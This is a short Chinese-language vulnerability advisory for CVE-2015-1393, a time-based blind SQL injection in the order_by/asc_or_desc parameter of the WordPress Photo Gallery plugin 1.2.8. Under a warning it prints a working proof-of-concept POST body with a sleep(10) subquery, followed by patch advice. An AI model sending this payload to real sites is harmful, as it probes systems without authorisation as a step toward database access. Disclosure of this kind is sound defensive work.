WordPress Photo Gallery插件'asc

发布日期:2015-01-29
更新日期:2015-02-03

受影响系统:
WordPress Photo Gallery 1.2.8
描述:
BUGTRAQ  ID: 72364
 CVE(CAN) ID: CVE-2015-1393

Photo Gallery高级插件可根据WordPress需要创建网站的图库。

Photo Gallery 1.2.8及其他版本没有有效过滤用户请求,POST中的参数asc_or_desc存在基于时间的盲SQL注入,成功利用后可使攻击者直接访问数据库。

<*来源:Sven Schleier
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
search_value=&amp;amp;page_number=1&amp;amp;search_or_not=&amp;amp;task=add&amp;amp;current_id=&amp;amp;ids_string=&amp;amp;asc_or_desc=asc&amp;amp;order_by=asc%2c(select%20*%20from%20(select(sleep(10)))a)

建议:
厂商补丁:

WordPress
 ---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://downloads.wordpress.org/plugin/photo-gallery.1.2.8.zip

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/c2a44e1a8bf75cf1659a0e69c75ae392.html